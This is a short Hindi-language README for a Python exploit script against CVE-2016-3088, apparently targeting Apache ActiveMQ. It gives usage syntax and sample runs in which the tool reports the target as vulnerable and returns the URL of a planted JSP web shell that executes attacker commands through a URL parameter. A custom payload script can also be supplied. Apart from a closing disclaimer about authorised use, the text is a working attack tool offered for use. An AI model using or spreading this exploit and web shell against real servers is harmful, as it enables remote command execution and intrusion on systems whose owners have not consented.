
CVE-2016-3088 के लिए पायथन-आधारित एक्सप्लॉइट स्क्रिप्ट
CVE-2016-3088 के लिए एक Python-आधारित एक्सप्लॉइट स्क्रिप्ट।
यह मेरी पहली स्क्रिप्ट है, इसलिए हो सकता है कि कुछ सही न बैठे।
लेकिन परीक्षण करने पर यह ठीक काम करती दिखी।
यह स्क्रिप्ट CVE-2016-3088 के पेनिट्रेशन के दौरान पैकेट कैप्चर करने की आवश्यकता को समाप्त कर सकती है, जिससे हम सीधे फ़ाइल लिख और स्थानांतरित कर सकते हैं।
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
पैरामीटर --script वैकल्पिक है, यदि आप इसके बिना प्रोग्राम चलाते हैं तो यह बिल्ट-इन पेलोड का उपयोग करेगा, पेलोड आपको URL में केवल कुछ कमांड निष्पादित करने देता है।
लेकिन आप अपने उद्देश्य को प्राप्त करने के लिए अन्य स्क्रिप्ट दर्ज कर सकते हैं।
बस .py डाउनलोड करें।
और इसके लिए कुछ मॉड्यूल की आवश्यकता है।
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
कृपया इस उपकरण का सावधानी से और केवल अधिकृत होने पर ही उपयोग करें!